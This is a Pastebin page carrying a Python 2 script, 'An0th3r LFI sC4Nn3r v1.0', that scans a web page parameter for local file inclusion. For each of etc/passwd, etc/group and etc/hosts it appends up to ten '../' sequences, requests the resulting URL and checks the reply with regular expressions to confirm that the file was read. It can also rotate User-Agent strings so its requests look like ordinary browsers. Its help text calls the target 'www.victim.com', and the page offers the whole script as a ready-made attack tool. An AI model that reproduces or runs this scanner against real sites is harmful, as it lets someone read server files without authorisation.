Googleinurl

[SCRIPT] An0th3r LFI sC4Nn3r v1.0

Dec 11th, 2014
1,161
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. #!/usr/bin/env  python26
  2.  
  3. import optparse
  4. import sys
  5. import urllib2, socket
  6. import random
  7. import re
  8.  
  9. #
  10. # Banner aLFI
  11. banner = """
  12.                  $$\      $$$$$$$$\ $$$$$$\\
  13.                  $$ |      $$  _____|\_$$  _|
  14.         $$$$$$\ $$ |      $$ |        $$ |
  15.         \____$$\ $$ |      $$$$$\     $$ |
  16.         $$$$$$$ |$$ |      $$  __|     $$ |
  17.        $$  __$$ |$$ |      $$ |        $$ |
  18.        \$$$$$$$ |$$$$$$$$\ $$ |      $$$$$$\\
  19.         \_______|\________|\__|      \______|
  20.  
  21.  
  22.  
  23.         $$$$$$\\
  24.        $$  __$$\\
  25.        $$ /  \__| $$$$$$$\ $$$$$$\ $$$$$$$\ $$$$$$$\  $$$$$$\  $$$$$$\\
  26.        \$$$$$$\ $$  _____|\____$$\ $$  __$$\ $$  __$$\ $$  __$$\ $$  __$$\\
  27.         \____$$\ $$ /      $$$$$$$ |$$ |  $$ |$$ |  $$ |$$$$$$$$ |$$ |  \__|
  28.        $$\  $$ |$$ |     $$  __$$ |$$ |  $$ |$$ |  $$ |$$   ____|$$ |
  29.        \$$$$$$  |\$$$$$$$\\$$$$$$$ |$$ |  $$ |$$ |  $$ |\$$$$$$$\ $$ |
  30.         \______/  \_______|\_______|\__|  \__|\__|  \__| \_______|\__|
  31.  
  32.                                                                 An0th3r LFI sC4Nn3r v1.0
  33.  
  34.                                Written by:
  35.  
  36.                              Claudio Viviani
  37.  
  38.                           http://www.homelab.it
  39.  
  40.                              info@homelab.it
  41.                           homelabit@protonmail.ch
  42.  
  43.                      https://www.facebook.com/homelabit
  44.                      https://twitter.com/homelabit
  45.                      https://plus.google.com/+HomelabIt1/
  46.            https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww
  47. """
  48.  
  49.  
  50. commandList = optparse.OptionParser('usage: %prog -u URL -t TARGET_PAGE [-p PORT] [--timeout sec] [-r, --random-agent]\n')
  51. commandList.add_option('-u', '--url',
  52.                   action="store",
  53.                   dest="url",
  54.                   help="Insert URL: http[s]://www.victim.com",
  55.                   )
  56. commandList.add_option('-t', '--target',
  57.                   action="store",
  58.                   dest="target",
  59.                   help="Insert page: The name of the page to be scanned (Ex. index.php?page=)",
  60.                   )
  61. commandList.add_option('-p', '--port',
  62.                   action="store",
  63.                   dest="port",
  64.                   default=0,
  65.                   type="int",
  66.                   help="[Insert Port Number] - Default 80 or 443",
  67.                   )
  68. commandList.add_option('--timeout',
  69.                   action="store",
  70.                   dest="timeout",
  71.                   default=10,
  72.                   type="int",
  73.                   help="[Timeout Value] - Default 10",
  74.                   )
  75. commandList.add_option('-r', '--random-agent',
  76.                   action="store_true",
  77.                   dest="randomagent",
  78.                   default=False,
  79.                   help="[Set random UserAgent]",
  80.                   )
  81.  
  82.  
  83. options, remainder = commandList.parse_args()
  84.  
  85.  
  86. # Usage:
  87. if ( not options.url or not options.target):
  88.         print(banner)
  89.         print
  90.         commandList.print_help()
  91.         sys.exit(1)
  92. #
  93. # UserAgent list
  94. # Top UA 18/08/2014
  95. # http://techblog.willshouse.com/2012/01/03/most-common-user-agents/
  96. def randomAgentGen():
  97.  
  98.  userAgent =    ['Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',
  99.                 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4 AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',
  100.                 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit/537.77.4 (KHTML, like Gecko) Version/7.0.5 Safari/537.77.4',
  101.                 'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',
  102.                 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0',
  103.                 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0',
  104.                 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:31.0) Gecko/20100101 Firefox/31.0',
  105.                 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',
  106.                 'Mozilla/5.0 (iPhone; CPU iPhone OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53',
  107.                 'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko',
  108.                 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36',
  109.                 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:30.0) Gecko/20100101 Firefox/30.0',
  110.                 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',
  111.                 'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',
  112.                 'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0',
  113.                 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',
  114.                 'Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53',
  115.                 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36',
  116.                 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0',
  117.                 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36',
  118.                 'Mozilla/5.0 (Windows NT 6.1; rv:31.0) Gecko/20100101 Firefox/31.0',
  119.                 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',
  120.                 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36',
  121.                 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',
  122.                 'Mozilla/5.0 (iPhone; CPU iPhone OS 7_1_1 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D201 Safari/9537.53',
  123.                 'Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',
  124.                 'Mozilla/5.0 (Windows NT 5.1; rv:31.0) Gecko/20100101 Firefox/31.0',
  125.                 'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0',
  126.                 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36',
  127.                 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:30.0) Gecko/20100101 Firefox/30.0',
  128.                 'Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko',
  129.                 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.76.4 (KHTML, like Gecko) Version/7.0.4 Safari/537.76.4',
  130.                 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit/537.78.2 (KHTML, like Gecko) Version/7.0.6 Safari/537.78.2',
  131.                 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/538.46 (KHTML, like Gecko) Version/8.0 Safari/538.46',
  132.                 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)',
  133.                 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',
  134.                 'Mozilla/5.0 (Windows NT 6.1; rv:30.0) Gecko/20100101 Firefox/30.0',
  135.                 'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36',
  136.                 'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)',
  137.                 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.59.10 (KHTML, like Gecko) Version/5.1.9 Safari/534.59.10',
  138.                 'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko',
  139.                 'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36',
  140.                 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.77.4 (KHTML, like Gecko) Version/6.1.5 Safari/537.77.4',
  141.                 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/34.0.1847.116 Chrome/34.0.1847.116 Safari/537.36',
  142.                 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.77.4 (KHTML, like Gecko) Version/6.1.5 Safari/537.77.4',
  143.                 'Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0',
  144.                 'Mozilla/5.0 (iPad; CPU OS 7_1_1 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D201 Safari/9537.53',
  145.                 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',
  146.                 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',
  147.                 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/537.75.14',
  148.                 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:31.0) Gecko/20100101 Firefox/31.0',
  149.                 'Mozilla/5.0 (iPhone; CPU iPhone OS 7_1 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D167 Safari/9537.53',
  150.                 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.74.9 (KHTML, like Gecko) Version/7.0.2 Safari/537.74.9',
  151.                 'Mozilla/5.0 (X11; Linux x86_64; rv:30.0) Gecko/20100101 Firefox/30.0',
  152.                 'Mozilla/5.0 (iPhone; CPU iPhone OS 7_0_4 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11B554a Safari/9537.53',
  153.                 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:31.0) Gecko/20100101 Firefox/31.0',
  154.                 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:24.0) Gecko/20100101 Firefox/24.0',
  155.                 'Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',
  156.                 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.7; rv:31.0) Gecko/20100101 Firefox/31.0',
  157.                 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/537.75.14',
  158.                 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)',
  159.                 'Mozilla/5.0 (Windows NT 5.1; rv:30.0) Gecko/20100101 Firefox/30.0',
  160.                 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36',
  161.                 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36',
  162.                 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20100101 Firefox/29.0',
  163.                 'Mozilla/5.0 (Windows NT 6.2; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0',
  164.                 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',
  165.                 'Mozilla/5.0 (iPhone; CPU iPhone OS 7_1_2 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) GSA/4.1.0.31802 Mobile/11D257 Safari/9537.53',
  166.                 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36',
  167.                 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:31.0) Gecko/20100101 Firefox/31.0',
  168.                 'Mozilla/5.0 (Windows NT 6.1; rv:24.0) Gecko/20100101 Firefox/24.0',
  169.                 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36',
  170.                 'Mozilla/5.0 (Windows NT 6.2; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0',
  171.                 'Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',
  172.                 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36',
  173.                 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/36.0.1985.125 Chrome/36.0.1985.125 Safari/537.36',
  174.                 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:30.0) Gecko/20100101 Firefox/30.0',
  175.                 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.3 (KHTML, like Gecko) Version/8.0 Safari/600.1.3',
  176.                 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36']
  177.  
  178.  if RANDOMAGENT:
  179.          UA = random.choice(userAgent)
  180.          headers = { 'User-Agent' : UA }
  181.  else:
  182.          UA = "Python-urllib/%s.%s" % sys.version_info[:2]
  183.          headers = { 'User-Agent' : UA }
  184.  
  185.  return headers
  186.  
  187. # File check list + regexp
  188. CHECK = dict()
  189. CHECK['etc/passwd'] = '^([a-z]*:[^:]*:[0-9]*:[0-9]*:[^:]*:/[^:]*:/[^:]*)$'
  190. CHECK['etc/group'] = '^([a-z]*:[^:]*:[0-9]*:[0-9]*)$'
  191. CHECK['etc/hosts'] = '^(((([1]?\d)?\d|2[0-4]\d|25[0-5])\.){3}(([1]?\d)?\d|2[0-4]\d|25[0-5]))|([\da-fA-F]{1,4}(\:[\da-fA-F]{1,4}){7})|(([\da-fA-F]{1,4}:){0,5}::([\da-fA-F]{1,4}:){0,5}[\da-fA-F]{1,4})'
  192.  
  193. RANDOMAGENT = options.randomagent
  194. TIMEOUT = options.timeout
  195. URL = options.url
  196. PORT = options.port
  197. TARGET = options.target
  198.  
  199. if URL[0:8] == "https://":
  200.         PROTO = URL[0:8]
  201.         URL = URL[8:]
  202.         if URL.endswith("/"):
  203.                 URL = URL.replace("/","")
  204.         if PORT == 0:
  205.                 PORT = 443
  206.  
  207. elif URL[0:7] == "http://":
  208.         PROTO = URL[0:7]
  209.         URL = URL[7:]
  210.         if URL.endswith("/"):
  211.                 URL = URL.replace("/","")
  212.         if PORT == 0:
  213.                 PORT = 80
  214. else:
  215.         PROTO = "http://"
  216.         URL = options.url
  217.         if URL.endswith("/"):
  218.                 URL = URL.replace("/","")
  219.         if PORT == 0:
  220.                 PORT = 80
  221.  
  222. try:
  223.         #URL = socket.gethostbyname( URL )
  224.         socket.gethostbyname( URL )
  225.  
  226. except socket.gaierror:
  227.         #could not resolve
  228.         print 'Hostname could not be resolved. Exiting'
  229.         sys.exit()
  230.  
  231. headers = randomAgentGen()
  232.  
  233. print(banner)
  234. print
  235. print('[*] URL:\t'+PROTO+URL)
  236. print('[*] TARGET:\t'+TARGET)
  237. print('[*] PORT:\t'+str(PORT))
  238. print
  239.  
  240. found = 0
  241.  
  242. for  fileCheck, fileRegexp in CHECK.items():
  243.         FILE = fileCheck
  244.         REGEXP = fileRegexp
  245.         checkValidRegexp = re.compile(REGEXP, re.IGNORECASE)
  246.  
  247.         for scanLFI in range(1, 11):
  248.  
  249.                 PATHTRAV = "../"
  250.  
  251.                 PATHTRAV = PATHTRAV * scanLFI
  252.  
  253.                 try:
  254.                         req = urllib2.Request(PROTO+URL+':'+str(PORT)+'/'+TARGET+PATHTRAV+FILE, None, headers)
  255.                         connection = urllib2.urlopen(req, None, TIMEOUT)
  256.                         response = connection.readlines()
  257.                         getcode = connection.getcode()
  258.  
  259.                         sentinel = 0
  260.                         for checkResponse in response:
  261.                                 #if (getcode == 200 and response != ""):
  262.                                 if (getcode == 200 and checkValidRegexp.match(checkResponse)):
  263.                                         sentinel = sentinel + 1
  264.  
  265.                         if sentinel > 1:
  266.                                 print('[+] '+PROTO+URL+':'+str(PORT)+'/'+TARGET+PATHTRAV+FILE+'\t <--- FOUND')
  267.                                 found = found + 1
  268.                         else:
  269.                                 print('[+] '+PROTO+URL+':'+str(PORT)+'/'+TARGET+PATHTRAV+FILE)
  270.  
  271.                 # HTTP error - 4xx, 5xx
  272.                 except urllib2.HTTPError:
  273.                         print('[+] '+PROTO+URL+':'+str(PORT)+'/'+TARGET+PATHTRAV+FILE)
  274.  
  275.                 # Connection error - Connection refused, No route to host
  276.                 except urllib2.URLError:
  277.                         print('Can\'t connect to host: '+PROTO+URL+' on port '+str(PORT))
  278.                         sys.exit()
  279.  
  280. if found < 1:
  281.         print
  282.         print('[+] Nothing found')
RAW Paste Data